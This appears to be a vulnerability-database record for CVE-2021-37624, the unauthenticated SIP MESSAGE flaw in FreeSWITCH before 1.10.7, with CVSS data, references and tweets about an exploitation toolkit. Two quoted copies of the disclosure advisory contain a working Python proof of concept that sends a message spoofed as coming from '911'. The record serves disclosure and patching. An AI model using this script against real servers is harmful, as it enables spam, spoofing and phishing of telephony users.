FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, FreeSWITCH does not authenticate SIP MESSAGE requests, leading to spam and message spoofing. By default, SIP requests of the type MESSAGE (RFC 3428) are not authenticated in the affected versions of FreeSWITCH. MESSAGE requests are relayed to SIP user agents registered with the FreeSWITCH server without requiring any authentication. Although this behaviour can be changed by setting the `auth-messages` parameter to `true`, it is not the default setting. Abuse of this security issue allows attackers to send SIP MESSAGE requests to any SIP user agent that is registered with the server without requiring authentication. Additionally, since no authentication is required, chat messages can be spoofed to appear to come from trusted entities. Therefore, abuse can lead to spam and enable social engineering, phishing and similar attacks. This issue is patched in version 1.10.7. Maintainers recommend that this SIP message type is authenticated by default so that FreeSWITCH administrators do not need to explicitly set the `auth-messages` parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication.
{"id": "CVE-2021-37624", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-37624", "description": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, FreeSWITCH does not authenticate SIP MESSAGE requests, leading to spam and message spoofing. By default, SIP requests of the type MESSAGE (RFC 3428) are not authenticated in the affected versions of FreeSWITCH. MESSAGE requests are relayed to SIP user agents registered with the FreeSWITCH server without requiring any authentication. Although this behaviour can be changed by setting the `auth-messages` parameter to `true`, it is not the default setting. Abuse of this security issue allows attackers to send SIP MESSAGE messages to any SIP user agent that is registered with the server without requiring authentication. Additionally, since no authentication is required, chat messages can be spoofed to appear to come from trusted entities. Therefore, abuse can lead to spam and enable social engineering, phishing and similar attacks. This issue is patched in version 1.10.7. Maintainers recommend that this SIP message type is authenticated by default so that FreeSWITCH administrators do not need to be explicitly set the `auth-messages` parameter. 
When following such a recommendation, a new parameter can be introduced to explicitly disable authentication.", "published": "2021-10-25T16:15:00", "modified": "2021-11-02T19:14:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 5.0}, "severity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-37624", "reporter": "security-advisories@github.com", "references": ["https://github.com/signalwire/freeswitch/security/advisories/GHSA-mjcm-q9h8-9xv3", "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7", "http://www.openwall.com/lists/oss-security/2021/10/25/6", "http://seclists.org/fulldisclosure/2021/Oct/44", "http://packetstormsecurity.com/files/164628/FreeSWITCH-1.10.6-Missing-SIP-MESSAGE-Authentication.html"], "cvelist": ["CVE-2021-37624"], "immutableFields": [], "lastseen": "2022-03-23T18:56:21", "viewCount": 29, "enchantments": {"dependencies": {"references": [{"type": "alpinelinux", "idList": ["ALPINE:CVE-2021-37624"]}, {"type": "githubexploit", "idList": ["0BF72729-44F7-545C-8475-3FBEB99370C9"]}, {"type": "packetstorm", "idList": 
["PACKETSTORM:164628"]}, {"type": "zdt", "idList": ["1337DAY-ID-36956"]}], "rev": 4}, "score": {"value": 2.1, "vector": "NONE"}, "twitter": {"counter": 7, "tweets": [{"link": "https://twitter.com/0xInfection/status/1467549209037393920", "text": "Published a blog around the finding and analysis of 2 /freeswitch vulns (CVE-2021-37624 and CVE-2021-41157) that were patched and disclosed a month ago.\nhttps://t.co/pjr4BYrwFp\n\nAlso releasing a scanning and exploitation tool for the vulnerabilities! :)\nhttps://t.co/AeulPBLSAJ"}, {"link": "https://twitter.com/0xInfection/status/1467549209037393920", "text": "Published a blog around the finding and analysis of 2 /freeswitch vulns (CVE-2021-37624 and CVE-2021-41157) that were patched and disclosed a month ago.\nhttps://t.co/pjr4BYrwFp\n\nAlso releasing a scanning and exploitation tool for the vulnerabilities! :)\nhttps://t.co/AeulPBLSAJ"}, {"link": "https://twitter.com/ipssignatures/status/1467615773405421568", "text": "The vuln CVE-2021-37624 has a tweet created 0 days ago and retweeted 8 times.\n/0xInfection/status/1467549209037393920\n/hashtag/Sncanfrcs3ghcu?src=hashtag_click"}, {"link": "https://twitter.com/ksg93rd/status/1467714288617992193", "text": "/hashtag/Offensive_security?src=hashtag_click\n1. A FreeSWITCH specific scanning and exploitation toolkit for CVE-2021-37624 / CVE-2021-41157\nhttps://t.co/DpYaXIua10\n2. 
Novel RTF Template Inject Technique Poised for Widespread Adoption\u202fBeyond APT Actors\nhttps://t.co/bb7E3BRgyh"}, {"link": "https://twitter.com/hack_git/status/1467737501557219338", "text": "A /hashtag/FreeSWITCH?src=hashtag_click specific /hashtag/scanning?src=hashtag_click and exploitation toolkit for CVE-2021-37624 / /hashtag/CVE?src=hashtag_click-2021-41157\nhttps://t.co/ozAl8iqkSD\n\nNovel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors\nhttps://t.co/JtudMUIcJO https://t.co/fR6qDIqhnK"}, {"link": "https://twitter.com/Securityblog/status/1467775224884117508", "text": "GitHub - 0xInfection/PewSWITCH: A FreeSWITCH specific scanning and exploitation toolkit for CVE-2021-37624 and CVE-2021-41157."}, {"link": "https://twitter.com/akaclandestine/status/1468170828634284037", "text": "GitHub - 0xInfection/PewSWITCH: A FreeSWITCH specific scanning and exploitation toolkit for CVE-2021-37624 and CVE-2021-41157."}], "modified": "2021-11-26T16:57:13"}, "backreferences": {"references": [{"type": "alpinelinux", "idList": ["ALPINE:CVE-2021-37624"]}, {"type": "githubexploit", "idList": ["0BF72729-44F7-545C-8475-3FBEB99370C9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:164628"]}, {"type": "zdt", "idList": ["1337DAY-ID-36956"]}]}, "exploitation": null, "vulnersScore": 2.1}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": "GitHub, Inc.", "cvss": {"3": {"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "score": 7.5}}}, "cpe": [], "cpe23": [], "cwe": ["CWE-287"], "affectedSoftware": [{"cpeName": "freeswitch:freeswitch", "version": "1.10.7", "operator": "lt", "name": "freeswitch"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:freeswitch:freeswitch:1.10.7:*:*:*:*:*:*:*", "versionEndExcluding": "1.10.7", "cpe_name": []}]}]}, "extraReferences": [{"url": 
"https://github.com/signalwire/freeswitch/security/advisories/GHSA-mjcm-q9h8-9xv3", "name": "https://github.com/signalwire/freeswitch/security/advisories/GHSA-mjcm-q9h8-9xv3", "refsource": "CONFIRM", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7", "name": "https://github.com/signalwire/freeswitch/releases/tag/v1.10.7", "refsource": "MISC", "tags": ["Third Party Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2021/10/25/6", "name": "[oss-security] 20211025 [ES2021-07] FreeSWITCH does not authenticate SIP MESSAGE requests, leading to spam and message spoofing", "refsource": "MLIST", "tags": ["Mailing List", "Third Party Advisory"]}, {"url": "http://seclists.org/fulldisclosure/2021/Oct/44", "name": "20211026 [ES2021-07] FreeSWITCH does not authenticate SIP MESSAGE requests, leading to spam and message spoofing", "refsource": "FULLDISC", "tags": ["Exploit", "Mailing List", "Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/164628/FreeSWITCH-1.10.6-Missing-SIP-MESSAGE-Authentication.html", "name": "http://packetstormsecurity.com/files/164628/FreeSWITCH-1.10.6-Missing-SIP-MESSAGE-Authentication.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}
{"zdt": [{"lastseen": "2021-12-03T01:50:26", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-26T00:00:00", "type": "zdt", "title": "FreeSWITCH 1.10.6 Missing SIP MESSAGE Authentication Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-37624"], "modified": "2021-10-26T00:00:00", "id": "1337DAY-ID-36956", "href": "https://0day.today/exploit/description/36956", "sourceData": "# FreeSWITCH does not authenticate SIP MESSAGE requests, leading to spam and message spoofing\n\n- Fixed versions: v1.10.7\n- Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2021-07-freeswitch-SIP-MESSAGE-without-auth\n- Vendor Security Advisory: https://github.com/signalwire/freeswitch/security/advisories/GHSA-mjcm-q9h8-9xv3\n- Other references: CVE-2021-37624\n- Tested vulnerable versions: <= v1.10.6\n- Timeline:\n - Report date: 2021-06-07\n - Fix provided for testing: 2021-07-27\n - Vendor release with fix: 2021-10-24\n - Enable Security advisory: 2021-10-25\n\n## Description\n\nBy default, SIP requests of the type MESSAGE (RFC 3428) are not authenticated 
in the affected versions of FreeSWITCH. MESSAGE requests are relayed to SIP user agents registered with the FreeSWITCH server without requiring any authentication. Although this behaviour can be changed by setting the `auth-messages` parameter to `true`, it is not the default setting.\n\n## Impact\n\nAbuse of this security issue allows attackers to send SIP MESSAGE messages to any SIP user agent that is registered with the server without requiring authentication. Additionally, since no authentication is required, chat messages can be spoofed to appear to come from trusted entities. Therefore, abuse can lead to spam and enable social engineering, phishing and similar attacks.\n\nWe are issuing this advisory because, in the course of our work, we have noticed that most FreeSWITCH installations that are exposed to the Internet do not authenticate MESSAGE requests.\n\n## How to reproduce the issue\n\n1. Install FreeSWITCH v1.10.6 or lower\n2. Run FreeSWITCH using the default configuration\n3. Register as a legitimate SIP user with the FreeSWITCH server (e.g. `sip:[email\u00a0protected]` where `192.168.1.100` is your FreeSWITCH server) using a softphone that can process MESSAGE (such as Zoiper)\n4. Save the below Python script to `anon-message.py`\n5. Run the Python script `python anon-message.py <freeswitch_ip> <target_extension>`\n6. 
Observe the SIP message appear on your softphone, pretending to be from 911\n\n\n```python\nimport sys, socket, random, string\n\nUDP_IP = sys.argv[1]\nUDP_PORT = 5060\next = sys.argv[2]\nrand = ''.join(random.choice(string.ascii_lowercase) for i in range(8))\nmsg=\"MESSAGE sip:%[email\u00a0protected]%s SIP/2.0\\r\\n\" % (ext, UDP_IP)\nmsg+=\"Via: SIP/2.0/UDP 192.168.1.159:46896;rport;branch=z9hG4bK-%s\\r\\n\" % rand\nmsg+=\"Max-Forwards: 70\\r\\n\"\nmsg+=\"From: 911 <sip:[email\u00a0protected]%s>;tag=%s\\r\\n\" %(UDP_IP, rand)\nmsg+=\"To: <sip:%[email\u00a0protected]%s>\\r\\n\" %(ext, UDP_IP)\nmsg+=\"Call-ID: %s\\r\\n\" % rand\nmsg+=\"CSeq: 1 MESSAGE\\r\\n\"\nmsg+=\"Contact: <sip:[email\u00a0protected]:48760;transport=udp>\\r\\n\"\nmsg+=\"Content-Type: text/plain\\r\\n\"\nmsg+=\"Content-Length: 5\\r\\n\\r\\n\"\nmsg+=\"hello\"\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.sendto(msg.encode(), (UDP_IP, UDP_PORT))\n```\n\n## Solution and recommendations\n\nUpgrade to a version of FreeSWITCH that fixes this issue.\n\nOur suggestion to the FreeSWITCH developers was the following:\n\n> Our recommendation is that this SIP message type is authenticated by default so that FreeSWITCH administrators do not need to be explicitly set the `auth-messages` parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication.\n", "sourceHref": "https://0day.today/exploit/36956", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "veracode": [{"lastseen": "2022-05-12T00:31:21", "description": "freeswitch is vulnerable to Authentication Bypass. 
The vulnerability exists because the SIP MESSAGE requests are not properly authenticated which allows an attacker to to send SIP MESSAGE messages to any SIP user agent that is registered with the server.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-05T11:38:07", "type": "veracode", "title": "Authentication Bypass", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-37624"], "modified": "2021-11-29T01:20:09", "id": "VERACODE:32828", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-32828/summary", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "alpinelinux": [{"lastseen": "2022-06-22T18:32:51", "description": "FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.7, FreeSWITCH does not authenticate SIP MESSAGE requests, leading to spam and message spoofing. By default, SIP requests of the type MESSAGE (RFC 3428) are not authenticated in the affected versions of FreeSWITCH. 
MESSAGE requests are relayed to SIP user agents registered with the FreeSWITCH server without requiring any authentication. Although this behaviour can be changed by setting the `auth-messages` parameter to `true`, it is not the default setting. Abuse of this security issue allows attackers to send SIP MESSAGE messages to any SIP user agent that is registered with the server without requiring authentication. Additionally, since no authentication is required, chat messages can be spoofed to appear to come from trusted entities. Therefore, abuse can lead to spam and enable social engineering, phishing and similar attacks. This issue is patched in version 1.10.7. Maintainers recommend that this SIP message type is authenticated by default so that FreeSWITCH administrators do not need to be explicitly set the `auth-messages` parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-25T16:15:00", "type": "alpinelinux", "title": "CVE-2021-37624", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2021-37624"], "modified": "2021-11-02T19:14:00", "id": "ALPINE:CVE-2021-37624", "href": "https://security.alpinelinux.org/vuln/CVE-2021-37624", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2021-10-25T17:33:42", "description": "", "cvss3": {}, "published": "2021-10-25T00:00:00", "type": "packetstorm", "title": "FreeSWITCH 1.10.6 Missing SIP MESSAGE Authentication", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-37624"], "modified": "2021-10-25T00:00:00", "id": "PACKETSTORM:164628", "href": "https://packetstormsecurity.com/files/164628/FreeSWITCH-1.10.6-Missing-SIP-MESSAGE-Authentication.html", "sourceData": "`# FreeSWITCH does not authenticate SIP MESSAGE requests, leading to spam and message spoofing \n \n- Fixed versions: v1.10.7 \n- Enable Security Advisory: https://github.com/EnableSecurity/advisories/tree/master/ES2021-07-freeswitch-SIP-MESSAGE-without-auth \n- Vendor Security Advisory: https://github.com/signalwire/freeswitch/security/advisories/GHSA-mjcm-q9h8-9xv3 \n- Other references: CVE-2021-37624 \n- Tested vulnerable versions: <= v1.10.6 \n- Timeline: \n- Report date: 2021-06-07 \n- Fix provided for testing: 2021-07-27 \n- Vendor release with fix: 2021-10-24 \n- Enable Security advisory: 2021-10-25 \n \n## Description \n \nBy default, SIP requests of the type MESSAGE (RFC 3428) are not authenticated in the affected versions of FreeSWITCH. MESSAGE requests are relayed to SIP user agents registered with the FreeSWITCH server without requiring any authentication. Although this behaviour can be changed by setting the `auth-messages` parameter to `true`, it is not the default setting. \n \n## Impact \n \nAbuse of this security issue allows attackers to send SIP MESSAGE messages to any SIP user agent that is registered with the server without requiring authentication. Additionally, since no authentication is required, chat messages can be spoofed to appear to come from trusted entities. 
Therefore, abuse can lead to spam and enable social engineering, phishing and similar attacks. \n \nWe are issuing this advisory because, in the course of our work, we have noticed that most FreeSWITCH installations that are exposed to the Internet do not authenticate MESSAGE requests. \n \n## How to reproduce the issue \n \n1. Install FreeSWITCH v1.10.6 or lower \n2. Run FreeSWITCH using the default configuration \n3. Register as a legitimate SIP user with the FreeSWITCH server (e.g. `sip:1000@192.168.1.100` where `192.168.1.100` is your FreeSWITCH server) using a softphone that can process MESSAGE (such as Zoiper) \n4. Save the below Python script to `anon-message.py` \n5. Run the Python script `python anon-message.py <freeswitch_ip> <target_extension>` \n6. Observe the SIP message appear on your softphone, pretending to be from 911 \n \n \n```python \nimport sys, socket, random, string \n \nUDP_IP = sys.argv[1] \nUDP_PORT = 5060 \next = sys.argv[2] \nrand = ''.join(random.choice(string.ascii_lowercase) for i in range(8)) \nmsg=\"MESSAGE sip:%s@%s SIP/2.0\\r\\n\" % (ext, UDP_IP) \nmsg+=\"Via: SIP/2.0/UDP 192.168.1.159:46896;rport;branch=z9hG4bK-%s\\r\\n\" % rand \nmsg+=\"Max-Forwards: 70\\r\\n\" \nmsg+=\"From: 911 <sip:911@%s>;tag=%s\\r\\n\" %(UDP_IP, rand) \nmsg+=\"To: <sip:%s@%s>\\r\\n\" %(ext, UDP_IP) \nmsg+=\"Call-ID: %s\\r\\n\" % rand \nmsg+=\"CSeq: 1 MESSAGE\\r\\n\" \nmsg+=\"Contact: <sip:911@192.168.1.159:48760;transport=udp>\\r\\n\" \nmsg+=\"Content-Type: text/plain\\r\\n\" \nmsg+=\"Content-Length: 5\\r\\n\\r\\n\" \nmsg+=\"hello\" \n \nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) \nsock.sendto(msg.encode(), (UDP_IP, UDP_PORT)) \n``` \n \n## Solution and recommendations \n \nUpgrade to a version of FreeSWITCH that fixes this issue. 
\n \nOur suggestion to the FreeSWITCH developers was the following: \n \n> Our recommendation is that this SIP message type is authenticated by default so that FreeSWITCH administrators do not need to be explicitly set the `auth-messages` parameter. When following such a recommendation, a new parameter can be introduced to explicitly disable authentication. \n \n## About Enable Security \n \n[Enable Security](https://www.enablesecurity.com) develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack. \n \n## Disclaimer \n \nThe information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. \n \n## Disclosure policy \n \nThis report is subject to Enable Security's vulnerability disclosure policy which can be found at <https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy>. 
\n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/164628/ES2021-07.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "githubexploit": [{"lastseen": "2022-02-23T18:02:37", "description": "# PewSWITCH\nA FreeSWITCH specific scanning and exploitation tool...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-11-28T13:12:38", "type": "githubexploit", "title": "Exploit for Improper Authentication in Freeswitch", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27624", "CVE-2021-41157", "CVE-2021-37624"], "modified": "2022-02-23T15:31:41", "id": "0BF72729-44F7-545C-8475-3FBEB99370C9", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "privateArea": 1}]}